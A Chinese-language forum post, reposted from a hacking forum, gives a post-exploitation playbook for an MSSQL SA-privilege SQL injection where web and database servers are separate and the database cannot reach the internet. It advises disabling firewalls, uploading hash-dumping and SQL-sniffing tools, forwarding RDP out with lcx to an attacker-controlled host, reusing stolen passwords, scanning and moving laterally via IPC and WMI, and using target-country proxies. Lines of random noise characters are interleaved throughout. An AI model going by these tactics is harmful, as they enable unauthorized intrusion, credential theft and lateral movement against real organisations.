当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
5 l5 f! M5 r3 |' A! t4 }
0 y, [ ~0 u6 D1 X8 ^- ]; O
+ p& |& z, H& L- S/ f* U
! ?" X7 }1 h- V1 C: J0 W8 c* W) \0 DSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
. ?* M! D+ s( f& W' t$ `
1 ^7 k. Y8 _1 c6 R9 h \% ? A: g* n4 O/ w
一、DB机有公网IP.
" k! c+ e* q1 Q, }3 F7 C; O2 G6 V4 N" A
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
6 R3 \4 g$ [5 Q% g0 ~3 _4 i+ c
4 E3 Q2 T0 M: q( \$ j# i$ Y( c) q) J- _
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
. K8 q; M/ @- d0 x! M& W! }* i7 Z' b7 h2 k/ r$ c* D+ [8 p k
* ]4 c& ^3 M- F7 U; t; |
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
4 A- x# \5 J" N! i' R0 d% e4 v. l" Y
( ^3 `$ q/ C- n- r* }1 P4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.9 F! p- O/ L3 [# x+ F7 M6 I
! W6 c) ]' ]; ]4 ]8 c5 d3 E( Y
~- J- Z6 C) t7 b
9 @3 V3 [ ~( `) x0 Y' p1 B* e
二、DB机只有内网IP
9 H4 ?: b1 U$ I! r/ o! q
+ v3 v; i/ j1 K- J1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
% `8 r# ]# k" D- t* n3 B- R: _+ Z! o0 S3 i% f$ e
7 E: I- a/ W- L: {8 N7 Z/ c2:停掉防火墙和IP策略再从内往外扫描.
: w: ]7 Y+ O3 |1 e8 O3 t# F' t* \( E; F
9 n8 H/ f4 @3 n: K k! @6 c' D3 L3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
' l$ k) \ A, B) R; D8 W: I1 S' D5 n" x" h, g9 j1 [7 r/ k
3 n3 I" m8 _, W+ \4:学会密码规律分析往往会有惊喜.3 y* N: r: o) b. F% X8 `& a, F! n
9 a2 G' K" T" W- }0 n
q5 ?3 g$ u0 }2 D7 w
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
1 _9 {1 }& N- x& L, `8 } w* \; d
# D: I' Q, ]2 C. S( k2 i5 h+ B" ` V3 S6 t% n
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对